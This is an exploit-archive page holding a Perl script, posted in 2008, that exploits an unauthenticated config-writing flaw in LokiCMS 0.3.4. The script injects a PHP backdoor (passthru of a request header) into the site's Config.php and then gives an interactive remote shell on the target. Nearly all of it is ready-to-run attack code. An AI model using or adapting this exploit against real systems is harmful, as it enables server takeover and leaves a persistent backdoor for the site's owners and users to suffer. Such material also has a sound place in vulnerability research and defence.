Home / exploits lokicms034-exec.txt
Posted on 13 October 2008
# Author: __GiReX__ # Homepage: http://girex.altervista.org # CMS: LokiCMS 0.3.4 # URL: http://www.lokicms.com/ # Description: LokiCMS is still vulnerable to Remote Command Execution (see: http://milw0rm.com/exploits/5408) # The exploit changed becouse the vars changed but the bugged function is the same: writeconfig() # LokiCMS does not check the access to admin.php via POST... #!/usr/bin/perl -w # LokiCMS <= 0.3.4 Remote Command Execution Exploit # Needs with magic_quotes_gpc = Off # Coded by __GiReX__ use LWP::UserAgent; if(not defined $ARGV[0]) { banner(); print "[-] Usage: perl $0 [host] [path] "; print "[-] Example: perl $0 localhost /lokicms/ "; exit; } my $lwp = new LWP::UserAgent or die; my $target = $ARGV[0] =~ /^http:/// ? $ARGV[0]: 'http://' . $ARGV[0]; $target .= $ARGV[1] unless not defined $ARGV[1]; $target .= '/' unless $target =~ /^http://(.?)/$/; banner(); my $res = $lwp->post($target.'admin.php', [ 'LokiACTION' => 'A_SAVE_G_SETTINGS', 'title' => "';echo "<!-- INFECTED -->";if(strlen($_SERVER['HTTP_CMD']))". "passthru($_SERVER['HTTP_CMD']);//", 'language' => 'english-utf-8', 'theme' => 'default' ]); if($res->is_error) { print "[-] Request mistake. Exploit terminated! "; exit (); } while(1) { print "[+] shell:~$ "; chomp($cmd = <STDIN>); last if $cmd eq 'exit'; $lwp->default_header( 'CMD' => $cmd ); my $res = $lwp->get($target.'includes/Config.php'); if($res->is_success and $res->content =~ /INFECTED/) { print " ". substr($res->content, index($res->content, 'INFECTED') + 12)." "; } else { print "[-] PHP Code not injected. maybe magic_quotes_gpc = On! "; last; } } sub banner { print "[+] LokiCMS 0.3.4 Remote Command Execution Exploit "; print "[+] Coded by __GiReX__ "; print " "; }
